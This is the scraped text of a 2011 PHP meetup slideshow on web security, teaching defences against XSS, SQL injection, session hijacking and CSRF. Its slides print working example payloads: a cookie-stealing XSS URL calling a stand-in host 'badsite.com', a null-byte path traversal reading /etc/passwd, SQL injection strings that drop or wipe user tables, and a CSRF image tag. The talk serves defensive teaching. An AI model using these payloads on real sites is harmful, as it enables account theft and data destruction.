Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

SydPHP Security in PHP

2,394 views

Published on

Security in PHP talk for SydPHP, Thursday 24th February, 2011

Published in: Technology
  • Be the first to comment

SydPHP Security in PHP

  1. 1. Security and PHP<br />February 2011<br />
  2. 2. Allan Shone<br />Technical Yahoo!, Local Paranoid @Yahoo!7<br />Been at Yahoo!7 just under 3 years<br />allan.shone@yahoo.com<br />
  3. 3. Website Security<br />February 2011<br />
  4. 4. What is Security?<br />Why is Security important?<br />What can you do about it?<br />
  5. 5. Types of issues<br />XSS<br />SQL Injection<br />Session Hijacking<br />CSRF<br />Phishing<br />
  6. 6. Why XSS?<br />February 2011<br />
  7. 7. Lead to larger problems<br />Used to inject code into your site<br />Bad people ™ can steal user information<br />
  8. 8. http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ealert%280%29;%3C/script%3E<br />http://sydphp.leetbix.com/template.php?load=%3Cscript%3Edocument.location=%27http://badsite.com%27%3C/script%3E<br />http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ea%3Ddocument.createElement(%22img%22)%3Ba.src%3D%22http%3A%2F%2Fbadsite.com%2F%3F%22%2Bdocument.cookie%3Bdocument.firstChild.appendChild(a)%3B%3C%2Fscript%3E<br />February 2011<br />
  9. 9. February 2011<br />
  10. 10. http://sydphp.leetbix.com/template.php?load=/etc/passwd%00<br />http://sydphp.leetbix.com/template.php?load=../some-config.conf%00<br />February 2011<br />
  11. 11. POST too<br />February 2011<br />
  12. 12. What do I do?!<br />February 2011<br />
  13. 13. Filter<br />Simplest solution: htmlentities()<br />February 2011<br />
  14. 14. SQL what?<br />February 2011<br />
  15. 15. Arbitrary SQL code being executed<br />Bypass login, edit database content<br />Find passwords, hidden information<br />
  16. 16. http://sydphp.leetbix.com/login.php<br />Password: ‘ OR 1=1 -- ‘<br />‘ OR 1=1; DROP TABLE users; -- ‘<br />‘ OR 1=1; UPDATE TABLE users SET password=‘’ WHERE 1=1; -- ‘<br />February 2011<br />
  17. 17. Oh no!<br />February 2011<br />
  18. 18. http://xkcd.com/327/<br />February 2011<br />
  19. 19. escape<br />February 2011<br />
  20. 20. mysql_real_escape_string()<br />addslashes()<br />PDO<br />PDO::quote()<br />
  21. 21. Session hijacking<br />February 2011<br />
  22. 22. Bad for users<br />Bad for data integrity<br />Easy to prevent<br />
  23. 23. Not stand-alone<br />February 2011<br />
  24. 24. Cookies<br />February 2011<br />
  25. 25. Integrity checking<br />February 2011<br />
  26. 26. CSRF? Sugar?<br />February 2011<br />
  27. 27. Cross-site request forgery<br />February 2011<br />
  28. 28. Simple, but un-common<br />February 2011<br />
  29. 29. <imgsrc=“http://othersite.com/changepasswd?new=onlyIKnow” /><br /><script><br />a=document.createElement(‘img’);a.src=‘http://badsite../’;document.firstChild.appendChild(a);<br />a.src=‘http://badsite.com/otherpage’;<br /></script><br />February 2011<br />
  30. 30. Integrity, integrity<br />February 2011<br />
  31. 31. Phishing!<br />February 2011<br />
  32. 32. Same, but different?<br />February 2011<br />
  33. 33. But what can you do<br />February 2011<br />
  34. 34. PHP’s filter functions<br />February 2011<br />
  35. 35. filter_has_var<br />filter_id<br />filter_input_array<br />filter_input<br />filter_list<br />filter_var_array<br />filter_var<br />
  36. 36. No more SuperGlobals<br />February 2011<br />
  37. 37. $search = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);<br />echo ”<h3>No results found for ‘{$search}’.</h3>";<br />echo "<a href='?search=$search&page=2'>Next page</a>";<br />February 2011<br />
  38. 38. INPUT_GET<br />INPUT_POST<br />INPUT_COOKIE<br />INPUT_SERVER<br />INPUT_ENV<br />February 2011<br />
  39. 39. Twitter <br />Allan Shone - @cerealboy<br />Jared Mooring - @jadzor<br />Filter function filters: http://au2.php.net/manual/en/filter.filters.php<br />February 2011<br />

×